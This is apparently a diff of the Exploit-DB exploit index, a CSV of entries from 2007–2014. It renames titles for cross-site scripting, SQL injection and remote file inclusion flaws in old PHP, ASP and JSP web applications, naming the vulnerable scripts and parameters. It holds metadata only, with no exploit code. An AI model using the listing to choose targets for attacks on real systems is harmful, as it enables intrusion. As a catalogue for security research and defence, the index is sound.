+30684,platforms/php/webapps/30684.txt,"SiteBar 3.3.8 - 'integrator.php?lang' Cross-Site Scripting",2007-10-18,"Robert Buchholz",php,webapps,0 30685,platforms/php/webapps/30685.txt,"SiteBar 3.3.8 - 'index.php' target Parameter Cross-Site Scripting",2007-10-18,"Robert Buchholz",php,webapps,0 -30686,platforms/php/webapps/30686.txt,"SiteBar 3.3.8 - command.php Modify User Action uid Parameter Cross-Site Scripting",2007-10-18,"Robert Buchholz",php,webapps,0 +30686,platforms/php/webapps/30686.txt,"SiteBar 3.3.8 - 'command.php?Modify User Action uid' Cross-Site Scripting",2007-10-18,"Robert Buchholz",php,webapps,0 30804,platforms/php/webapps/30804.txt,"VBTube 1.1 - Search Cross-Site Scripting",2007-11-24,Crackers_Child,php,webapps,0 30689,platforms/php/webapps/30689.php,"Taboada Macronews 1.0 - SQL Injection",2014-01-04,Jefrey,php,webapps,0 31027,platforms/php/webapps/31027.txt,"pMachine Pro 2.4.1 - Multiple Cross-Site Scripting Vulnerabilities",2008-01-14,fuzion,php,webapps,0 @@ -32058,7 +32059,7 @@ id,file,description,date,author,platform,type,port 30708,platforms/asp/webapps/30708.txt,"Aleris Web Publishing Server 3.0 - Page.asp SQL Injection",2007-10-25,joseph.giron13,asp,webapps,0 30712,platforms/php/webapps/30712.txt,"Multi-Forums - 'Directory.php' Multiple SQL Injections",2007-10-25,KiNgOfThEwOrLd,php,webapps,0 30715,platforms/php/webapps/30715.txt,"WordPress 2.3 - Edit-Post-Rows.php Cross-Site Scripting",2007-10-29,waraxe,php,webapps,0 -30716,platforms/php/webapps/30716.txt,"Smart-Shop - 'index.php' Multiple Parameter Cross-Site Scripting",2007-10-29,Doz,php,webapps,0 +30716,platforms/php/webapps/30716.txt,"Smart-Shop - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2007-10-29,Doz,php,webapps,0 30717,platforms/php/webapps/30717.txt,"Omnistar Live - KB.php Cross-Site Scripting",2007-10-29,Doz,php,webapps,0 30718,platforms/php/webapps/30718.txt,"Saxon 5.4 - Menu.php Cross-Site Scripting",2007-10-29,netVigilance,php,webapps,0 30719,platforms/php/webapps/30719.txt,"Saxon 5.4 - Example.php SQL Injection",2007-10-29,netVigilance,php,webapps,0 @@ -32097,7 +32098,7 @@ id,file,description,date,author,platform,type,port 30777,platforms/cgi/webapps/30777.txt,"Citrix Netscaler 8.0 build 47.8 - Generic_API_Call.pl Cross-Site Scripting",2007-11-19,nnposter,cgi,webapps,0 30778,platforms/asp/webapps/30778.txt,"Click&BaneX - 'Details.asp' SQL Injection",2007-11-19,"Aria-Security Team",asp,webapps,0 30975,platforms/cgi/webapps/30975.txt,"W3-mSQL - Error Page Cross-Site Scripting",2008-01-03,vivek_infosec,cgi,webapps,0 -30976,platforms/php/webapps/30976.txt,"MyPHP Forum 3.0 - 'search.php' Multiple Unspecified SQL Injection",2008-01-03,The:Paradox,php,webapps,0 +30976,platforms/php/webapps/30976.txt,"MyPHP Forum 3.0 - 'search.php' Multiple Unspecified SQL Injections",2008-01-03,The:Paradox,php,webapps,0 30977,platforms/php/webapps/30977.txt,"WordPress 2.2.3 - 'wp-admin/post.php' popuptitle Parameter Cross-Site Scripting",2008-01-03,3APA3A,php,webapps,0 30786,platforms/php/webapps/30786.txt,"Middle School Homework Page 1.3 Beta 1 - Multiple Vulnerabilities",2014-01-07,AtT4CKxT3rR0r1ST,php,webapps,80 30790,platforms/php/webapps/30790.txt,"Cubic CMS - Multiple Vulnerabilities",2014-01-07,"Eugenio Delfa",php,webapps,80 @@ -32106,46 +32107,46 @@ id,file,description,date,author,platform,type,port 30815,platforms/php/webapps/30815.txt,"Tilde 4.0 - Aarstal Parameter Cross-Site Scripting",2007-11-26,KiNgOfThEwOrLd,php,webapps,0 30817,platforms/php/webapps/30817.html,"Liferay Portal 4.3.1 - Forgot-Password Cross-Site Scripting",2007-11-27,"Joshua Morin",php,webapps,0 30818,platforms/cgi/webapps/30818.txt,"ht://Dig 3.2 - Htsearch Cross-Site Scripting",2007-11-27,"Michael Skibbe",cgi,webapps,0 -30820,platforms/php/webapps/30820.txt,"p.mapper 3.2 beta3 - incPHP/globals.php _SESSION[PM_INCPHP] Parameter Remote File Inclusion",2007-11-27,ShAy6oOoN,php,webapps,0 -30821,platforms/php/webapps/30821.txt,"p.mapper 3.2 beta3 - plugins/export/mc_table.php _SESSION[PM_INCPHP] Parameter Remote File Inclusion",2007-11-27,ShAy6oOoN,php,webapps,0 +30820,platforms/php/webapps/30820.txt,"p.mapper 3.2 beta3 - 'incPHP/globals.php?_SESSION[PM_INCPHP]' Remote File Inclusion",2007-11-27,ShAy6oOoN,php,webapps,0 +30821,platforms/php/webapps/30821.txt,"p.mapper 3.2 beta3 - 'plugins/export/mc_table.php?_SESSION[PM_INCPHP]' Remote File Inclusion",2007-11-27,ShAy6oOoN,php,webapps,0 30822,platforms/php/webapps/30822.txt,"BEA AquaLogic Interaction 6.0/6.1 Plumtree Portal - Multiple Information Disclosure Vulnerabilities",2007-11-28,"Adrian Pastor",php,webapps,0 30823,platforms/php/webapps/30823.txt,"bcoos 1.0.10 - 'ratephoto.php' SQL Injection",2007-11-28,Lostmon,php,webapps,0 30824,platforms/php/webapps/30824.txt,"bcoos 1.0.10 - 'ratelink.php' SQL Injection",2007-11-28,Lostmon,php,webapps,0 -30826,platforms/php/webapps/30826.txt,"Ossigeno CMS 2.2_pre1 - 'upload/xax/admin/modules/install_module.php level' Parameter Remote File Inclusion",2007-11-30,ShAy6oOoN,php,webapps,0 -30827,platforms/php/webapps/30827.txt,"Ossigeno CMS 2.2_pre1 - 'upload/xax/admin/modules/uninstall_module.php level' Parameter Remote File Inclusion",2007-11-30,ShAy6oOoN,php,webapps,0 -30828,platforms/php/webapps/30828.txt,"Ossigeno CMS 2.2_pre1 - 'upload/xax/admin/patch/index.php level' Parameter Remote File Inclusion",2007-11-30,ShAy6oOoN,php,webapps,0 -30829,platforms/php/webapps/30829.txt,"Ossigeno CMS 2.2_pre1 - 'upload/xax/ossigeno/admin/install_module.php level' Parameter Remote File Inclusion",2007-11-30,ShAy6oOoN,php,webapps,0 -30830,platforms/php/webapps/30830.txt,"Ossigeno CMS 2.2_pre1 - 'upload/xax/ossigeno/admin/uninstall_module.php level' Parameter Remote File Inclusion",2007-11-30,ShAy6oOoN,php,webapps,0 -30831,platforms/php/webapps/30831.txt,"Ossigeno CMS 2.2_pre1 - ossigeno_modules/ossigeno-catalogo/xax/ossigeno/catalogo/common.php ossigeno Parameter Remote File Inclusion",2007-11-30,ShAy6oOoN,php,webapps,0 +30826,platforms/php/webapps/30826.txt,"Ossigeno CMS 2.2_pre1 - 'upload/xax/admin/modules/install_module.php?level' Remote File Inclusion",2007-11-30,ShAy6oOoN,php,webapps,0 +30827,platforms/php/webapps/30827.txt,"Ossigeno CMS 2.2_pre1 - 'upload/xax/admin/modules/uninstall_module.php?level' Remote File Inclusion",2007-11-30,ShAy6oOoN,php,webapps,0 +30828,platforms/php/webapps/30828.txt,"Ossigeno CMS 2.2_pre1 - 'upload/xax/admin/patch/index.php?level' Remote File Inclusion",2007-11-30,ShAy6oOoN,php,webapps,0 +30829,platforms/php/webapps/30829.txt,"Ossigeno CMS 2.2_pre1 - 'upload/xax/ossigeno/admin/install_module.php?level' Remote File Inclusion",2007-11-30,ShAy6oOoN,php,webapps,0 +30830,platforms/php/webapps/30830.txt,"Ossigeno CMS 2.2_pre1 - 'upload/xax/ossigeno/admin/uninstall_module.php?level' Remote File Inclusion",2007-11-30,ShAy6oOoN,php,webapps,0 +30831,platforms/php/webapps/30831.txt,"Ossigeno CMS 2.2_pre1 - 'ossigeno_modules/ossigeno-catalogo/xax/ossigeno/catalogo/common.php?ossigeno' Remote File Inclusion",2007-11-30,ShAy6oOoN,php,webapps,0 30836,platforms/php/webapps/30836.txt,"bcoos 1.0.10 - 'ratefile.php' SQL Injection",2007-11-30,Lostmon,php,webapps,0 -30841,platforms/asp/webapps/30841.txt,"Absolute News Manager .NET 5.1 - 'pages/default.aspx template' Parameter Remote File Access",2007-12-04,"Adrian Pastor",asp,webapps,0 -30842,platforms/asp/webapps/30842.txt,"Absolute News Manager .NET 5.1 - 'xlaabsolutenm.aspx' Multiple Parameter SQL Injections",2007-12-04,"Adrian Pastor",asp,webapps,0 +30841,platforms/asp/webapps/30841.txt,"Absolute News Manager .NET 5.1 - 'pages/default.aspx?template' Remote File Access",2007-12-04,"Adrian Pastor",asp,webapps,0 +30842,platforms/asp/webapps/30842.txt,"Absolute News Manager .NET 5.1 - 'xlaabsolutenm.aspx' Multiple SQL Injections",2007-12-04,"Adrian Pastor",asp,webapps,0 30843,platforms/asp/webapps/30843.txt,"Absolute News Manager .NET 5.1 - 'xlaabsolutenm.aspx' rmore Parameter Cross-Site Scripting",2007-12-04,"Adrian Pastor",asp,webapps,0 30844,platforms/asp/webapps/30844.txt,"Absolute News Manager .NET 5.1 - 'pages/default.aspx' template Parameter Cross-Site Scripting",2007-12-04,"Adrian Pastor",asp,webapps,0 30845,platforms/asp/webapps/30845.txt,"Absolute News Manager .NET 5.1 - 'getpath.aspx' Direct Request Error Message Information",2007-12-04,"Adrian Pastor",asp,webapps,0 30846,platforms/php/webapps/30846.txt,"phpMyChat 0.14.5 - chat/deluser.php3 LIMIT Parameter Cross-Site Scripting",2007-12-04,beenudel1986,php,webapps,0 -30847,platforms/php/webapps/30847.txt,"phpMyChat 0.14.5 - chat/users_popupL.php3 Multiple Parameter Cross-Site Scripting",2007-12-04,beenudel1986,php,webapps,0 -30848,platforms/php/webapps/30848.txt,"Joomla! Component Content 1.5 RC3 - 'view' Parameter SQL Injection",2007-12-05,beenudel1986,php,webapps,0 -30849,platforms/php/webapps/30849.txt,"Joomla! Component com_search 1.5 RC3 - 'index.php' Multiple Parameter SQL Injection",2007-12-05,beenudel1986,php,webapps,0 +30847,platforms/php/webapps/30847.txt,"phpMyChat 0.14.5 - 'chat/users_popupL.php3' Multiple Cross-Site Scripting Vulnerabilities",2007-12-04,beenudel1986,php,webapps,0 +30848,platforms/php/webapps/30848.txt,"Joomla! Component Content 1.5 RC3 - 'view' SQL Injection",2007-12-05,beenudel1986,php,webapps,0 +30849,platforms/php/webapps/30849.txt,"Joomla! Component com_search 1.5 RC3 - 'index.php' Multiple SQL Injections",2007-12-05,beenudel1986,php,webapps,0 30851,platforms/php/webapps/30851.txt,"VisualShapers EZContents 1.4.5 - File Disclosure",2007-12-05,p4imi0,php,webapps,0 30852,platforms/php/webapps/30852.txt,"Kayako SupportSuite 3.0.32 - PHP_SELF Trigger_Error Function Cross-Site Scripting",2007-12-06,imei,php,webapps,0 30853,platforms/php/webapps/30853.txt,"OpenNewsletter 2.5 - 'Compose.php' Cross-Site Scripting",2007-12-06,Manu,php,webapps,0 30854,platforms/php/webapps/30854.sh,"wwwstats 3.21 - Clickstats.php Multiple HTML Injection Vulnerabilities",2007-12-15,"Jesus Olmos Gonzalez",php,webapps,0 30855,platforms/asp/webapps/30855.txt,"WebDoc 3.0 - Multiple SQL Injections",2007-12-07,Chrysalid,asp,webapps,0 -30857,platforms/php/webapps/30857.txt,"webSPELL 4.1.2 - usergallery.php galleryID Parameter Cross-Site Scripting",2007-12-10,Brainhead,php,webapps,0 -30858,platforms/php/webapps/30858.txt,"webSPELL 4.1.2 - calendar.php Multiple Parameter Cross-Site Scripting",2007-12-10,Brainhead,php,webapps,0 +30857,platforms/php/webapps/30857.txt,"webSPELL 4.1.2 - 'usergallery.php?galleryID' Cross-Site Scripting",2007-12-10,Brainhead,php,webapps,0 +30858,platforms/php/webapps/30858.txt,"webSPELL 4.1.2 - 'calendar.php' Multiple Cross-Site Scripting Vulnerabilities",2007-12-10,Brainhead,php,webapps,0 30859,platforms/php/webapps/30859.txt,"SquirrelMail G/PGP Encryption Plugin 2.0/2.1 - Access Validation / Input Validation",2007-12-10,"Tomas Kuliavas",php,webapps,0 30860,platforms/asp/webapps/30860.txt,"bttlxe Forum 2.0 - Multiple SQL Injections / Cross-Site Scripting Vulnerabilities",2007-12-10,Mormoroth,asp,webapps,0 -30861,platforms/php/webapps/30861.txt,"E-Xoops 1.0.5/1.0.8 - mylinks/ratelink.php lid Parameter SQL Injection",2007-12-10,Lostmon,php,webapps,0 -30862,platforms/php/webapps/30862.txt,"E-Xoops 1.0.5/1.0.8 - adresses/ratefile.php lid Parameter SQL Injection",2007-12-10,Lostmon,php,webapps,0 -30863,platforms/php/webapps/30863.txt,"E-Xoops 1.0.5/1.0.8 - mydownloads/ratefile.php lid Parameter SQL Injection",2007-12-10,Lostmon,php,webapps,0 -30864,platforms/php/webapps/30864.txt,"E-Xoops 1.0.5/1.0.8 - mysections/ratefile.php lid Parameter SQL Injection",2007-12-10,Lostmon,php,webapps,0 +30861,platforms/php/webapps/30861.txt,"E-Xoops 1.0.5/1.0.8 - 'mylinks/ratelink.php?lid' SQL Injection",2007-12-10,Lostmon,php,webapps,0 +30862,platforms/php/webapps/30862.txt,"E-Xoops 1.0.5/1.0.8 - 'adresses/ratefile.php?lid' SQL Injection",2007-12-10,Lostmon,php,webapps,0 +30863,platforms/php/webapps/30863.txt,"E-Xoops 1.0.5/1.0.8 - 'mydownloads/ratefile.php?lid' SQL Injection",2007-12-10,Lostmon,php,webapps,0 +30864,platforms/php/webapps/30864.txt,"E-Xoops 1.0.5/1.0.8 - 'mysections/ratefile.php?lid' SQL Injection",2007-12-10,Lostmon,php,webapps,0 30884,platforms/php/webapps/30884.txt,"XOOPS 2.2.5 - register.php Cross-Site Scripting",2007-11-12,"Omer Singer",php,webapps,0 30886,platforms/php/webapps/30886.txt,"MKPortal 1.1 Gallery Module - SQL Injection",2007-12-13,"Sw33t h4cK3r",php,webapps,0 30887,platforms/php/webapps/30887.txt,"phPay 2.2.1 - Windows Installations Local File Inclusion",2007-12-15,"Michael Brooks",php,webapps,0 30888,platforms/php/webapps/30888.txt,"phpRPG 0.8 - '/tmp' Directory PHPSESSID Cookie Session Hijacking",2007-12-15,"Michael Brooks",php,webapps,0 30889,platforms/php/webapps/30889.txt,"WordPress 2.3.1 - Unauthorized Post Access",2007-12-15,"Michael Brooks",php,webapps,0 -30890,platforms/php/webapps/30890.txt,"Black Sheep Web Software Form Tools 1.5 - Multiple Remote File Inclusion",2007-12-14,RoMaNcYxHaCkEr,php,webapps,0 +30890,platforms/php/webapps/30890.txt,"Black Sheep Web Software Form Tools 1.5 - Multiple Remote File Inclusions",2007-12-14,RoMaNcYxHaCkEr,php,webapps,0 30891,platforms/php/webapps/30891.txt,"Flyspray 0.9.9 - Multiple Cross-Site Scripting Vulnerabilities",2007-12-09,"KAWASHIMA Takahiro",php,webapps,0 30892,platforms/php/webapps/30892.txt,"Neuron News 1.0 - Multiple SQL Injections / Cross-Site Scripting Vulnerabilities",2007-12-17,"hadihadi & black.shadowes",php,webapps,0 30893,platforms/php/webapps/30893.txt,"PHP Security Framework - Multiple Input Validation Vulnerabilities",2007-12-17,DarkFig,php,webapps,0 @@ -32162,44 +32163,44 @@ id,file,description,date,author,platform,type,port 30919,platforms/cgi/webapps/30919.txt,"SiteScape Forum - 'dispatch.cgi' Tcl Command Injection",2007-12-20,niekt0,cgi,webapps,0 30921,platforms/php/webapps/30921.txt,"MRBS 1.2.x - 'view_entry.php' SQL Injection",2007-12-21,root@hanicker.it,php,webapps,0 30923,platforms/php/webapps/30923.txt,"MyBlog 1.x - 'Games.php ID' Remote File Inclusion",2007-12-22,"Beenu Arora",php,webapps,0 -30924,platforms/php/webapps/30924.txt,"Dokeos 1.x - forum/viewthread.php forum Parameter Cross-Site Scripting",2007-12-22,Doz,php,webapps,0 -30925,platforms/php/webapps/30925.txt,"Dokeos 1.x - forum/viewforum.php forum Parameter Cross-Site Scripting",2007-12-22,Doz,php,webapps,0 -30926,platforms/php/webapps/30926.txt,"Dokeos 1.x - work/work.php display_upload_form Action origin Parameter Cross-Site Scripting",2007-12-22,Doz,php,webapps,0 -30927,platforms/php/webapps/30927.txt,"Agares Media ThemeSiteScript 1.0 - 'loadadminpage' Parameter Remote File Inclusion",2007-12-24,Koller,php,webapps,0 -30929,platforms/php/webapps/30929.txt,"Logaholic - update.php page Parameter SQL Injection",2007-12-24,malibu.r,php,webapps,0 -30930,platforms/php/webapps/30930.txt,"Logaholic - 'index.php' Parameter Parameter SQL Injection",2007-12-24,malibu.r,php,webapps,0 +30924,platforms/php/webapps/30924.txt,"Dokeos 1.x - 'forum/viewthread.php?forum' Cross-Site Scripting",2007-12-22,Doz,php,webapps,0 +30925,platforms/php/webapps/30925.txt,"Dokeos 1.x - 'forum/viewforum.php?forum' Cross-Site Scripting",2007-12-22,Doz,php,webapps,0 +30926,platforms/php/webapps/30926.txt,"Dokeos 1.x - 'work/work.php?display_upload_form Action origin' Cross-Site Scripting",2007-12-22,Doz,php,webapps,0 +30927,platforms/php/webapps/30927.txt,"Agares Media ThemeSiteScript 1.0 - 'loadadminpage' Remote File Inclusion",2007-12-24,Koller,php,webapps,0 +30929,platforms/php/webapps/30929.txt,"Logaholic - 'update.php?page' SQL Injection",2007-12-24,malibu.r,php,webapps,0 +30930,platforms/php/webapps/30930.txt,"Logaholic - 'index.php' SQL Injection",2007-12-24,malibu.r,php,webapps,0 30931,platforms/php/webapps/30931.txt,"Logaholic - 'index.php' conf Parameter Cross-Site Scripting",2007-12-24,malibu.r,php,webapps,0 -30932,platforms/php/webapps/30932.txt,"Logaholic - profiles.php newconfname Parameter Cross-Site Scripting",2007-12-24,malibu.r,php,webapps,0 -30937,platforms/php/webapps/30937.txt,"Limbo CMS 1.0.4 - 'com_option' Parameter Cross-Site Scripting",2007-12-25,"Omer Singer",php,webapps,0 +30932,platforms/php/webapps/30932.txt,"Logaholic - 'profiles.php?newconfname' Cross-Site Scripting",2007-12-24,malibu.r,php,webapps,0 +30937,platforms/php/webapps/30937.txt,"Limbo CMS 1.0.4 - 'com_option' Cross-Site Scripting",2007-12-25,"Omer Singer",php,webapps,0 30938,platforms/asp/webapps/30938.txt,"Web Sihirbazi 5.1.1 - 'default.asp' Multiple SQL Injections",2007-12-24,bypass,asp,webapps,0 -30940,platforms/asp/webapps/30940.txt,"IPortalX - forum/login_user.asp Multiple Parameter Cross-Site Scripting",2007-12-27,Doz,asp,webapps,0 -30941,platforms/asp/webapps/30941.txt,"IPortalX - blogs.asp Date Parameter Cross-Site Scripting",2007-12-27,Doz,asp,webapps,0 +30940,platforms/asp/webapps/30940.txt,"IPortalX - 'forum/login_user.asp' Multiple Cross-Site Scripting Vulnerabilities",2007-12-27,Doz,asp,webapps,0 +30941,platforms/asp/webapps/30941.txt,"IPortalX - 'blogs.asp?Date' Cross-Site Scripting",2007-12-27,Doz,asp,webapps,0 30945,platforms/php/webapps/30945.txt,"NetBizCity FaqMasterFlexPlus - 'faq.php' Cross-Site Scripting",2007-12-28,"Juan Galiana Lara",php,webapps,0 30946,platforms/php/webapps/30946.txt,"Collabtive 1.1 - 'managetimetracker.php' SQL Injection",2014-01-15,"Yogesh Phadtare",php,webapps,80 30947,platforms/php/webapps/30947.txt,"NetBizCity FaqMasterFlexPlus - 'faq.php' SQL Injection",2007-12-28,"Juan Galiana Lara",php,webapps,0 -30948,platforms/php/webapps/30948.txt,"OpenBiblio 0.x - staff_del_confirm.php Multiple Parameter Cross-Site Scripting",2007-12-28,"Juan Galiana Lara",php,webapps,0 -30949,platforms/php/webapps/30949.txt,"OpenBiblio 0.x - theme_del_confirm.php name Parameter Cross-Site Scripting",2007-12-28,"Juan Galiana Lara",php,webapps,0 +30948,platforms/php/webapps/30948.txt,"OpenBiblio 0.x - 'staff_del_confirm.php' Multiple Cross-Site Scripting Vulnerabilities",2007-12-28,"Juan Galiana Lara",php,webapps,0 +30949,platforms/php/webapps/30949.txt,"OpenBiblio 0.x - 'theme_del_confirm.php?name' Cross-Site Scripting",2007-12-28,"Juan Galiana Lara",php,webapps,0 30950,platforms/php/webapps/30950.html,"PHPJabbers Pet Listing Script 1.0 - Multiple Vulnerabilities",2014-01-15,HackXBack,php,webapps,80 -30951,platforms/php/webapps/30951.html,"OpenBiblio 0.x - theme_preview.php themeName Parameter Cross-Site Scripting",2007-12-28,"Juan Galiana Lara",php,webapps,0 +30951,platforms/php/webapps/30951.html,"OpenBiblio 0.x - 'theme_preview.php?themeName' Cross-Site Scripting",2007-12-28,"Juan Galiana Lara",php,webapps,0 30952,platforms/php/webapps/30952.html,"PHPJabbers Property Listing Script 2.0 - Cross-Site Request Forgery (Add Admin)",2014-01-15,HackXBack,php,webapps,80 30953,platforms/php/webapps/30953.txt,"PHPJabbers Vacation Packages Listing 2.0 - Multiple Vulnerabilities",2014-01-15,HackXBack,php,webapps,80 30954,platforms/php/webapps/30954.txt,"PHPJabbers Hotel Booking System 3.0 - Multiple Vulnerabilities",2014-01-15,HackXBack,php,webapps,80 30955,platforms/php/webapps/30955.txt,"PHPJabbers Vacation Rental Script 3.0 - Multiple Vulnerabilities",2014-01-15,HackXBack,php,webapps,80 -30957,platforms/php/webapps/30957.txt,"PHCDownload 1.1 - search.php string Parameter SQL Injection",2007-12-29,Lostmon,php,webapps,0 -30958,platforms/php/webapps/30958.txt,"PHCDownload 1.1 - search.php string Parameter Cross-Site Scripting",2007-12-29,Lostmon,php,webapps,0 +30957,platforms/php/webapps/30957.txt,"PHCDownload 1.1 - 'search.php?string' SQL Injection",2007-12-29,Lostmon,php,webapps,0 +30958,platforms/php/webapps/30958.txt,"PHCDownload 1.1 - 'search.php?string' Cross-Site Scripting",2007-12-29,Lostmon,php,webapps,0 30959,platforms/php/webapps/30959.txt,"Makale Scripti - Cross-Site Scripting",2007-12-29,GeFORC3,php,webapps,0 30960,platforms/php/webapps/30960.pl,"CustomCMS 3.1 - 'vars.php' SQL Injection",2007-12-29,Pr0metheuS,php,webapps,0 30961,platforms/php/webapps/30961.txt,"MatPo.de Kontakt Formular 1.4 - 'function.php' Remote File Inclusion",2007-12-30,bd0rk,php,webapps,0 30962,platforms/php/webapps/30962.txt,"MilliScripts - 'dir.php' Cross-Site Scripting",2007-12-31,"Jose Luis Gangora Fernandez",php,webapps,0 30963,platforms/asp/webapps/30963.txt,"InstantSoftwares Dating Site - Login SQL Injection",2007-12-31,"Aria-Security Team",asp,webapps,0 -30964,platforms/php/webapps/30964.txt,"LiveCart 1.0.1 - 'return' Parameter Cross-Site Scripting (1)",2007-12-31,Doz,php,webapps,0 -30965,platforms/php/webapps/30965.txt,"LiveCart 1.0.1 - 'q' Parameter Cross-Site Scripting",2007-12-31,Doz,php,webapps,0 -30966,platforms/php/webapps/30966.txt,"LiveCart 1.0.1 - 'return' Parameter Cross-Site Scripting (2)",2007-12-31,Doz,php,webapps,0 -30967,platforms/php/webapps/30967.txt,"LiveCart 1.0.1 - 'email' Parameter Cross-Site Scripting",2007-12-31,Doz,php,webapps,0 +30964,platforms/php/webapps/30964.txt,"LiveCart 1.0.1 - 'return' Cross-Site Scripting (1)",2007-12-31,Doz,php,webapps,0 +30965,platforms/php/webapps/30965.txt,"LiveCart 1.0.1 - 'q' Cross-Site Scripting",2007-12-31,Doz,php,webapps,0 +30966,platforms/php/webapps/30966.txt,"LiveCart 1.0.1 - 'return' Cross-Site Scripting (2)",2007-12-31,Doz,php,webapps,0 +30967,platforms/php/webapps/30967.txt,"LiveCart 1.0.1 - 'email' Cross-Site Scripting",2007-12-31,Doz,php,webapps,0 30979,platforms/php/webapps/30979.txt,"WordPress 2.2.3 - 'wp-admin/edit.php' backup Parameter Cross-Site Scripting",2008-01-03,3APA3A,php,webapps,0 30980,platforms/php/webapps/30980.txt,"AwesomeTemplateEngine 1 - Multiple Cross-Site Scripting Vulnerabilities",2008-01-03,MustLive,php,webapps,0 30981,platforms/php/webapps/30981.txt,"PRO-Search 0.17 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2008-01-03,MustLive,php,webapps,0 -30982,platforms/php/webapps/30982.html,"Nucleus CMS 3.0.1 - 'myid' Parameter SQL Injection",2008-01-03,MustLive,php,webapps,0 +30982,platforms/php/webapps/30982.html,"Nucleus CMS 3.0.1 - 'myid' SQL Injection",2008-01-03,MustLive,php,webapps,0 30983,platforms/php/webapps/30983.txt,"ExpressionEngine 1.2.1 - HTTP Response Splitting / Cross-Site Scripting",2008-01-03,MustLive,php,webapps,0 30984,platforms/php/webapps/30984.txt,"eTicket 1.5.5 - 'newticket.php' Multiple Cross-Site Scripting Vulnerabilities",2007-01-03,"Omer Singer",php,webapps,0 31083,platforms/php/webapps/31083.txt,"Nilson's Blogger 0.11 - 'comments.php' Local File Inclusion",2008-01-31,muuratsalo,php,webapps,0 @@ -32208,16 +32209,16 @@ id,file,description,date,author,platform,type,port 30992,platforms/php/webapps/30992.txt,"Strawberry 1.1.1 - 'html.php' Remote Code Execution",2008-01-07,"Eugene Minaev",php,webapps,0 30993,platforms/asp/webapps/30993.txt,"Snitz Forums 2000 3.4.5/3.4.6 - Multiple Cross-Site Scripting Vulnerabilities",2008-01-07,Doz,asp,webapps,0 30994,platforms/php/webapps/30994.html,"eTicket 1.5.5.2 - admin.php Cross-Site Request Forgery",2008-01-07,L4teral,php,webapps,0 -30995,platforms/php/webapps/30995.txt,"eTicket 1.5.5.2 - view.php s Parameter Cross-Site Scripting",2008-01-07,L4teral,php,webapps,0 -30996,platforms/php/webapps/30996.txt,"eTicket 1.5.5.2 - 'search.php' Multiple Parameter SQL Injection",2008-01-07,L4teral,php,webapps,0 -30997,platforms/php/webapps/30997.txt,"eTicket 1.5.5.2 - 'admin.php' Multiple Parameter SQL Injection",2008-01-07,L4teral,php,webapps,0 +30995,platforms/php/webapps/30995.txt,"eTicket 1.5.5.2 - 'view.php?s' Cross-Site Scripting",2008-01-07,L4teral,php,webapps,0 +30996,platforms/php/webapps/30996.txt,"eTicket 1.5.5.2 - 'search.php' Multiple SQL Injections",2008-01-07,L4teral,php,webapps,0 +30997,platforms/php/webapps/30997.txt,"eTicket 1.5.5.2 - 'admin.php' Multiple SQL Injections",2008-01-07,L4teral,php,webapps,0 31000,platforms/php/webapps/31000.txt,"SysHotel On Line System - 'index.php' Local File Inclusion",2008-01-08,p4imi0,php,webapps,0 31001,platforms/php/webapps/31001.txt,"IceWarp Mail Server 9.1.1 - 'admin/index.html' Cross-Site Scripting",2008-01-08,Ekin0x,php,webapps,0 31003,platforms/php/webapps/31003.txt,"Omegasoft Insel 7 - Authentication Bypass / User Enumeration",2008-01-09,MC.Iglo,php,webapps,0 -31004,platforms/jsp/webapps/31004.txt,"Sun Java System Identity Manager 6.0/7.0/7.1 - '/idm/login.jsp' Multiple Parameter Cross-Site Scripting",2008-01-09,"Jan Fry and Adrian Pastor",jsp,webapps,0 -31005,platforms/jsp/webapps/31005.txt,"Sun Java System Identity Manager 6.0/7.0/7.1 - '/idm/account/findForSelect.jsp resultsForm' Parameter Cross-Site Scripting",2008-01-09,"Jan Fry and Adrian Pastor",jsp,webapps,0 -31006,platforms/jsp/webapps/31006.txt,"Sun Java System Identity Manager 6.0/7.0/7.1 - '/idm/help/index.jsp helpUrl' Parameter Remote Frame Injection",2008-01-09,"Jan Fry and Adrian Pastor",jsp,webapps,0 -31007,platforms/jsp/webapps/31007.txt,"Sun Java System Identity Manager 6.0/7.0/7.1 - '/idm/user/main.jsp activeControl' Parameter Cross-Site Scripting",2008-01-09,"Jan Fry and Adrian Pastor",jsp,webapps,0 +31004,platforms/jsp/webapps/31004.txt,"Sun Java System Identity Manager 6.0/7.0/7.1 - '/idm/login.jsp' Multiple Cross-Site Scripting Vulnerabilities",2008-01-09,"Jan Fry and Adrian Pastor",jsp,webapps,0 +31005,platforms/jsp/webapps/31005.txt,"Sun Java System Identity Manager 6.0/7.0/7.1 - '/idm/account/findForSelect.jsp?resultsForm' Cross-Site Scripting",2008-01-09,"Jan Fry and Adrian Pastor",jsp,webapps,0 +31006,platforms/jsp/webapps/31006.txt,"Sun Java System Identity Manager 6.0/7.0/7.1 - '/idm/help/index.jsp?helpUrl' Remote Frame Injection",2008-01-09,"Jan Fry and Adrian Pastor",jsp,webapps,0 +31007,platforms/jsp/webapps/31007.txt,"Sun Java System Identity Manager 6.0/7.0/7.1 - '/idm/user/main.jsp?activeControl' Cross-Site Scripting",2008-01-09,"Jan Fry and Adrian Pastor",jsp,webapps,0 31008,platforms/php/webapps/31008.txt,"Joomla! Component SMF Forum 1.1.4 - Multiple Cross-Site Scripting Vulnerabilities",2008-01-09,Doz,php,webapps,0 31009,platforms/php/webapps/31009.txt,"ID-Commerce 2.0 - 'liste.php' SQL Injection",2008-01-10,consultant.securite,php,webapps,0 31011,platforms/php/webapps/31011.txt,"Members Area System 1.7 - 'view_func.php' Remote File Inclusion",2008-01-11,ShipNX,php,webapps,0 @@ -32228,16 +32229,16 @@ id,file,description,date,author,platform,type,port 31022,platforms/php/webapps/31022.txt,"PHP Running Management 1.0.2 - 'index.php' Cross-Site Scripting",2008-01-13,"Christophe VG",php,webapps,0 31034,platforms/php/webapps/31034.txt,"MyBB 1.2.10 - 'moderation.php' Multiple SQL Injections",2008-01-16,waraxe,php,webapps,0 31035,platforms/php/webapps/31035.txt,"Clever Copy 3.0 - Multiple SQL Injections / Cross-Site Scripting Vulnerabilities",2008-01-17,hadihadi,php,webapps,0 -31037,platforms/php/webapps/31037.txt,"phpAutoVideo 2.21 - sidebar.php loadpage Parameter Remote File Inclusion",2008-01-18,"H-T Team",php,webapps,0 +31037,platforms/php/webapps/31037.txt,"phpAutoVideo 2.21 - 'sidebar.php?loadpage' Remote File Inclusion",2008-01-18,"H-T Team",php,webapps,0 31038,platforms/php/webapps/31038.txt,"phpAutoVideo 2.21 - 'index.php' cat Parameter Cross-Site 